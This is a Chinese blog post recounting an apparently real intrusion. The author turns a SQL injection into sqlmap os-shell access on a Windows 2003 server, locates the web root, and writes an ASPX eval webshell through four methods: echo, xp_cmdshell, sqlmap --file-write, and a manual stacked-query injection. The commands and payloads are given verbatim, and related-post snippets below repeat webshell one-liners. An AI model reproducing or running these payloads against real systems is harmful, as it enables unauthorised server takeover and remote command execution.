记一次sql注入艰难上传马过程

最新推荐文章于 2023-10-06 15:28:42 发布
最新推荐文章于 2023-10-06 15:28:42 发布
阅读量4.9k 收藏 10
点赞数 2
分类专栏: SQL注入 文章标签: sql web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46079186/article/details/122703019
版权

先说一下我的思路,得到一个sql注入点,sqlmap 进行os-shell ,然后想上传webshell,首先进行cs 上线,发现无法上线cs,原因是目标系统windwos 2003 没有powershell,换一个思路,先找到web路径,然后上传webshell。找到web路径之后,发现路径带中文,os-shell写入webshell 的时候就会提示没有这个路径,然后进行一个手注发现上传成功

  1. 发现注入点,使用sqlmap进行os-shell
    在这里插入图片描述
  2. 尝试上线cs,为了更好的后续操作(失败)
    执行powershell 提示不是内部命令,(原因是windows 2003 没有安装powershell)
    在这里插入图片描述
  3. 换一个思路进行,先找到web 目录,然后进行上传webshell
    我们不知道web 目录在哪个盘,首先先看一下系统有哪些盘
    执行命令fsutil fsinfo drives
    在这里插入图片描述

然后继续查找,web路径
g: & cd \ & dir /S *.aspx dir /S 1234.aspx 查找G盘有1234.aspx文件的地方
原谅我码的太死,毕竟快过年了谁也不想去吃免费的饭
在这里插入图片描述
得到路径为G:\xxx安装包\xxxnese\xxxnese\

  1. 找到路径之后上传webshell,然后就开始了我的无脑上传webshell
    首先使用第一种方法:
echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > G:\xxxx安装包\xxxnese\xxxxnese\test.aspx

发现上传失败
在这里插入图片描述
第二种方法:

exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > G:\xxxx安装包\xxxnese\xxxxnese\test.aspx'

上传失败
在这里插入图片描述
第三种方法:
使用 --file-write

sqlmap -u "xxxx"  -file-write J:\webshell\shell.aspx --file-dest G:\xxx安装包\xxxxnese\xxxxnese\test.aspx -v 2 --batch

依然失败
(当时找不到原因,后面发现是因为中文路径的原因)

第四种方法:
然后就是使用手注

?id=1';exec master..xp_cmdshell 'echo  ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> >G:\xxxx安装包\xxxxnese\xxxxnese\test.aspx'--

页面正常返回,写入成功

蚁剑连接
在这里插入图片描述

~ Venus
关注
  • 2
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sql server注入分类之上与组件扩展
qq_42990434的博客
12-17 283
本章目录:Mssql1. 利用sp\_makewebtask写入一句话木2. dbowner权限下写一句话组件扩展堆叠注入下的扩展运用 Mssql 1. 利用sp_makewebtask写入一句话木 1 . 修复上传 ;exec sp_makewebtask 'c:\inetpub\wwwroot\x.asp','select''%3C%25%65%76%61%6C%20%72%65%71%75%65%73%74%28%22%63%68%6F%70%70%65%72%22%29%25%3E'''
sqlmap的--os-shell
qq_54037445的博客
01-15 2549
(1)、询问你是否需要sqlmap去尝试网站的绝对路径,一般是尝试一些常用的绝对路径,如:'C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/'等,我们使用的是靶场,他爆破不到,所以选择n;利用into outfile 向指定的网站的物理路径写入一个木文件,该木文件的编写语言为该网站的编程语言,这个木文件的主要作用是可以上传一个用于执行命令的木,并且对用于执行命令的木进行赋权,使其具有读写执行权限;(2)、已知网站的物理路径;
sqlmap --os-shell 使用方法
m0_50818626的博客
06-07 3941
可以看到最下方有文件上传的位置,在这里我们可以上传一句话木。如上图所示,红框处很明显是一个传参点,我们就在这个页面抓包。总结:sqlmap -os-shell 的使用需要以下条件。抓到包之后将内容保存到桌面的1000.txt文件下。--os-shell:本质就是写入两个php文件。-dbms=mysql:指定跑mysql数据库。我们获得了两个url,我们访问第一个url。这里我们先选择4,因为网站是php代码写的。三、上传一句话木,连接蚁剑。上图就是一句话木的内容。二、sqlmap跑包。
sqlmap之--os-shell
热门推荐
qq_45927819的博客
03-26 1万+
1、–os-shell原理 使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。 –os-shell的执行条件: dbms为mysql,网站必须是root权限 攻击者需要知道网站的绝对路径 magic_quotes_gpc = off,php主动转移功能关闭 2、环境介绍 phpstudy+sqlmap 3、探测网站根目录 python3 sqlmap.py -u "127.0.0.1/sqli-labs-master
关于--os-shellwebshell
qq_40806924的博客
07-30 2041
1.首先需要知道目录(web目录) 2.得是DBA权限 寻找web目录 dir C:\ /s /b | find “xLogin.aspx” 这里需要注意转义^ echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > 'C://FFJWebTJ//fon.aspx' os-shell 无法执行的时候,权限低的时候可以尝试 sql-shellwebshell select
一次成功的sql注入入侵检测附带sql性能优化
09-11
SQL注入是一种常见的网络安全威胁,攻击者通过在输入字段中插入恶意的SQL代码,以获取未授权的数据或控制数据库服务器。描述中提到的问题表明,开发者早期可能忽视了对用户输入的严格验证,导致了SQL注入漏洞的存在...
SQL注入过程深入分析
09-10
SQL注入是一种严重的网络安全威胁,它发生在应用程序没有正确过滤或验证用户输入,导致恶意构造的SQL语句被执行时。本文将深入剖析SQL注入的全过程,揭示其危害,并提供一些防范措施。 首先,让我们了解SQL注入的...
一次sql注入问题的筛查报告 ,主要 是sql 注入的问题
最新发布
05-10
以下是对"一次SQL注入问题的筛查报告"的详细分析和相关知识点的介绍: 一、SQL注入的基础知识 1. SQL注入原理:当用户输入的数据未经处理就直接拼接到SQL查询语句中时,攻击者可以通过构造特殊输入,使得查询执行非...
ASP.NET防范SQL注入式攻击的方法
01-02
一、什么是SQL注入式攻击?  SQL注入式攻击就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。在某些表单中,用户输入的内容直接用来构造(或者影响)动态SQL命令,...
sqlmap --os-shell(写入木获取getshell
NSQ0207的博客
09-06 1139
抓包,查看报错暴露出绝对路径。
getshell姿势(四)--SQL注入
qq_45936617的博客
10-06 245
当发现目标存在SQL注入时,我们也可以使用sqlmap工具获取目标服务器的命令执行权限。使用的命令是SQLMAP的--os-shell。使用命令的条件是:1、当前用户有文件读写权限2、secure_file_priv的值不为NULL3、知道网站的绝对路径该命令的利用原理:1、使用用户具有的文件写权限,在网站写一个文件上传文件2、通过文件上传文件,上传命令交互的文件。
sqlmap上传shell--dvwa演示】--sql注入常用语句
m0_63241485的博客
08-31 1699
sql上传shellsql常用语句,sqlmap常用语句
SQL注入webshell
柠檬i的博客
08-06 705
`INTO OUTFILE`是MySQL中用于将查询结果输出到文件的语法。它允许将查询结果写入到服务器文件系统中的指定文件。
SQL注入GetShell的方法(1)
forinput的博客
05-06 3762
SQL注入getshell的五中方式
黑客笔一次sql注入到内网漫游
QIANDXX的博客
01-06 560
对于红队队员来说,打点之后最重要的就是横向的内网渗透了。
黑客笔一次进入内网是一种怎样的体验~
QIANDXX的博客
01-09 473
前言 之前打了一个棒子国的站点,感觉很不过瘾 --os-shell 被拦截,有waf,不能直接上线cs
利用sqlmap和蚁剑进行简单的渗透测试和挂小操作
dbabs的博客
01-24 605
利用sqlmap进行文件上传和简单的渗透测试
powershell cs上线_从SQL注入到Cobalt Strike上线
weixin_39550410的博客
11-21 1097
介绍在这篇文章中,我将指导您如何在SQL注入中使用XP_CMDSHELL上线Cobalt Strike。为了解决这个问题,我们首先需要设置一个工作环境为此,我们将使用安装了HACKME Bank的windowsserver2003。请参考这引导你开始跑步。一旦您成功地在WindowsServer2003虚拟机上安装了HackMeBank,您将需要安装一些附加的服务包,以便在该计算机上运行...
powershell cs上线_sqlserver注入到cs上线
weixin_39827905的博客
11-21 317
随手录一下项目挖洞的情况,因为是私密项目,脱敏之后,权当是公众号水文章了,也是顺带录一下自己挖洞的历程,希望一天比一天进步,发过的文章就是最好的见证成长的录。狗头在上,打码为敬一看这个界面,就知道是老系统,肯定存在很多问题,随手一试,发现万能密码直接登录成功其他端口测试发现数据库为sqlserver,且是sa用户尝试开启xp扩展Poc:uname=admin';EXEC maste...
sql注入实战项目操作过程
10-21
SQL注入实战项目操作过程一般包括以下步骤: 1. 确定目标网站并进行信息收集,包括网站结构、数据库类型、网站漏洞等。 2. 使用工具或手动方式进行漏洞扫描,寻找可利用的SQL注入漏洞。 3. 利用找到的漏洞进行注入攻击,获取目标网站的敏感信息或者控制目标网站。 4. 对注入点进行深入挖掘,尝试获取更多的敏感信息或者提升攻击权限。 5. 在攻击结束后,清理痕迹并修复漏洞,以免被其他攻击者利用。 需要注意的是,进行SQL注入攻击是非常危险的行为,必须遵守法律法规和道德规范,不得进行未经授权的攻击行为。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值